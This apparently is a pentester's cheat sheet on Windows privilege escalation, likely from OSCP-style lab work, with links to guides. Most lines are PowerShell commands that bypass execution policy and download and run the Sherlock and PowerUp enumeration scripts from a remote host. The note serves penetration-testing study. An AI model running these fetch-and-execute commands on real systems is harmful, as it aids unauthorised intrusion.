http://virgil-cj.blogspot.com/2018/02/escalation-time.html
powershell.exe -ExecutionPolicy Bypass -C:\inetpub\drupal-7.54\sherlock.ps1 Find-AllVulns
powershell.exe -exec bypass -Command "& {Import-Module 'C:\inetpub\drupal-7.54\sherlock.ps1'; Find-AllVulns}"
powershell -nop -c IEX (New-Object Net.Webclient).downloadstring("""http://10.10.14.19/Sherlock.ps1""");Find-AllVulns
c:\>powershell.exe "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.19/PowerUp.ps1') ; Invoke-AllChecks"
powershell.exe -ExecutionPolicy Bypass -Command “& {Import-Module .\PowerUp.ps1; Invoke-AllChecks}”
powershell.exe -ExecutionPolicy Bypass -Command "& {Import-Module .\PowerUp.ps1; Invoke-AllChecks}"
powershell.exe -Version 2 -ExecutionPolicy Bypass -Command "& {Import-Module .\PowerUp.ps1; Invoke-AllChecks}"
c:\>powershell.exe -ExecutionPolicy Bypass -noLogo -Command "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.19/powerup.ps1') ; Invoke-AllChecks"
c:\>powershell.exe "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.19/Sherlock.ps1') ; Find-AllVulns"
https://null-byte.wonderhowto.com/how-to/use-mingw-compile-windows-exploits-kali-linux-0179461/
https://github.com/pentestmonkey/windows-privesc-check
http://hackingandsecurity.blogspot.com/2017/09/oscp-windows-priviledge-escalation.html
https://github.com/HarmJ0y/Misc-PowerShell/blob/master/Get-System.ps1
https://github.com/rasta-mouse/Sherlock
https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html
https://chryzsh.gitbooks.io/pentestbook/privilege_escalation_windows.html
https://github.com/pentestmonkey/windows-privesc-check
http://www.fuzzysecurity.com/tutorials/16.html
https://blog.ropnop.com/transferring-files-from-kali-to-windows/
http://www.greyhathacker.net/?p=738
http://it-ovid.blogspot.com/2012/02/windows-privilege-escalation.html?m=1
http://www.fuzzysecurity.com/tutorials/16.html
https://toshellandback.com/2015/11/24/ms-priv-esc/
https://www.reddit.com/r/AskNetsec/comments/3ujqu3/best_windows_privilege_escalation_resources/
https://gist.github.com/sckalath/ec7af6a1786e3de6c309
https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/
https://www.offensive-security.com/metasploit-unleashed/privilege-escalation/
https://www.harmj0y.net/blog/powershell/powerup-a-usage-guide/
powershell.exe -exec bypass -Command "& {Import-Module .\PowerUp.ps1; Invoke-AllChecks}" > test.txt
https://chryzsh.gitbooks.io/pentestbook/privilege_escalation_windows.html
https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/